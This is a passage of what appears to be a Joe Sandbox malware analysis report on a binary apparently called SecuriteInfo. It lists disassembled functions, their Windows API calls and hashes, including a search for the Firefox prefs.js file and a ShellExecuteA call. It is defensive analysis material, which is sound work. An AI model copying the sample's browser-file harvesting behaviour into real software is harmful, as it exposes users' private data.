                  • Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
                  • Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                  • Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
                  Function 0040D9D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$FileFindFirst
                  • String ID: *.*$prefs.js
                  • API String ID: 2516927864-1592826420
                  • Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                  • Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
                  • Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                  • Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
                  Function 004066AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileNameSavestrcpy
                  • String ID: L
                  • API String ID: 1182090483-2909332022
                  • Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                  • Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
                  • Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                  • Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
                  Function 00407D23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadMenuA.USER32(00000000), ref: 00407D2B
                  • sprintf.MSVCRT ref: 00407D4E
                    • Part of subcall function 00407BCE: GetMenuItemCount.USER32(?), ref: 00407BE4
                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
                    • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32(?), ref: 00407C3E
                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                    • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                    • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                    • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                  • String ID: menu_%d
                  • API String ID: 3671758413-2417748251
                  • Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                  • Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
                  • Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                  • Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
                  Function 004084B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
                  • strrchr.MSVCRT ref: 004084BB
                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileModuleNamestrcatstrrchr
                  • String ID: _lng.ini
                  • API String ID: 3097366151-1948609170
                  • Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                  • Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
                  • Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                  • Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
                  Function 00406552 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteA.SHELL32(00418388,open,?,0041344F,0041344F,00000005), ref: 00406568
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: O4A$open
                  • API String ID: 587946157-3166864092
                  • Opcode ID: 9e6802b33b5cac27b58214f79fa19b5d011751a3236ad9fa1aa3ed0329bb7868
                  • Instruction ID: 449ca028383310d53200be1944a6bd751f504fbe34d0cfd866494f64672fa994
                  • Opcode Fuzzy Hash: 9e6802b33b5cac27b58214f79fa19b5d011751a3236ad9fa1aa3ed0329bb7868
                  • Instruction Fuzzy Hash: C5C012B12902027AEA114E30EC09F6A7A98DB84F02F104429B601E80E0DB5188885A1E
                  Function 00407570 Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalmemcpymemsetstrlen
                  • String ID:
                  • API String ID: 3110682361-0
                  • Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                  • Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
                  • Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                  • Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
                  Function 00408638 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: eb03ff296926441e48f35a82af38a44947cfbfa61d2a0b9abfff05ba54c8add2
                  • Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
                  • Opcode Fuzzy Hash: eb03ff296926441e48f35a82af38a44947cfbfa61d2a0b9abfff05ba54c8add2
                  • Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
                  Function 00406AA3 Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                  Download Yara Rule
                  APIs
                  • strlen.MSVCRT ref: 00406AAF
                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
                    • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
                    • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
                    • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,76F90A60,00406B78,00000001,?,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406141
                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
                  • memcpy.MSVCRT ref: 00406B12
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 3669619086-0
                  • Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                  • Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
                  • Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                  • Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54